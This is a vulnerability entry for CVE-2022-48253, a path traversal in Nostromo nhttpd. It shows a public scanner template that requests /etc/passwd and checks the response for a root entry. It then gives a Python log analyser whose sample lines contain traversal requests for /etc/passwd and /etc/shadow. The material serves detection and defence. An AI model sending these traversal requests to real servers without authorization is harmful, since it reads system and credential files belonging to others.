CVE-2022-48253: Nostromo nhttpd path traversal

Date: 2025-09-01 | Affected software: Nostromo nhttpd | PoC: public

Vulnerability description

nhttpd in Nostromo before 2.1 is vulnerable to a path traversal that may allow an attacker to execute arbitrary commands on the remote server. The vulnerability occurs when the homedirs option is used.

PoC code [public] (YAML scanner template)

id: CVE-2022-48253

info:
  name: Nostromo nhttpd path traversal
  author: zan8in
  severity: critical
  verified: true
  description: |
    nhttpd in Nostromo before 2.1 is vulnerable to a path traversal that may allow an attacker to execute arbitrary commands on the remote server. The vulnerability occurs when the homedirs option is used.

set:
  hostname: request.url.host
rules:
  r0:
    request:
      raw: |-
        GET /etc/passwd HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    expression: '"root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)'
expression: r0()
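The template above detects a vulnerable instance by requesting /etc/passwd and matching the body against root:.*?:[0-9]*:[0-9]*:. From the defender's side, the same traversal shows up in the web server's access log as requests that walk out of the document root or ask for files under /etc, and the status code tells you whether the server actually served them. The following Python is an added example, not code from the page or from the Nostromo project: it assumes Common Log Format lines (nhttpd's real log layout is not on the page; the five lines are constructed), flags traversal and sensitive-path requests after percent-decoding and dot-segment normalization, and reuses the template's body regex as a helper for validating a scan response.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Constructed Common Log Format lines (assumption: not real nhttpd output).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Sep/2025:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.5 - - [01/Sep/2025:10:00:02 +0000] "GET /etc/passwd HTTP/1.1" 200 1843
198.51.100.9 - - [01/Sep/2025:10:00:03 +0000] "GET /~alice/../../../etc/shadow HTTP/1.1" 404 0
198.51.100.9 - - [01/Sep/2025:10:00:04 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1843
192.0.2.7 - - [01/Sep/2025:10:00:05 +0000] "GET /docs/guide.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Paths that a static web server has no business serving (illustrative list).
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow")

# Same body check the template's expression uses.
PASSWD_RE = re.compile(r"root:.*?:[0-9]*:[0-9]*:")


def decode_path(path):
    """Strip the query string and percent-decode twice to catch double encoding."""
    return unquote(unquote(path.split("?", 1)[0]))


def normalize(path):
    """Collapse '.' and '..' segments the way a naive file-serving routine would."""
    return normpath(decode_path(path))


def has_dot_dot(path):
    """True if any decoded path segment is '..' (the traversal primitive)."""
    return ".." in decode_path(path).split("/")


def classify(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    norm = normalize(path)
    reasons = []
    if has_dot_dot(path):
        reasons.append("dot-dot segment in path")
    if norm in SENSITIVE_PATHS or norm.startswith("/etc/"):
        reasons.append("request resolves to " + norm)
    if not reasons:
        return None
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "path": path,
        "normalized": norm,
        "status": status,
        "served": status == 200,  # 200 means the server handed the file over
        "reasons": reasons,
    }


def scan(log_text):
    """Run classify() over every line and keep the findings, in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


def looks_like_passwd(body):
    """True if an HTTP response body contains a passwd-style root entry."""
    return PASSWD_RE.search(body) is not None


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        verdict = "SERVED" if f["served"] else "blocked"
        print(f"{f['ip']} {f['path']} -> {f['normalized']} [{f['status']} {verdict}]: "
              + "; ".join(f["reasons"]))
```

A 200 on a request that normalizes to /etc/passwd is the signal that the homedirs traversal is live, not merely attempted; a 404 on the same pattern is still worth recording as reconnaissance. Double decoding is deliberate: a single unquote misses %252e-style encodings that some proxies pass through untouched.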
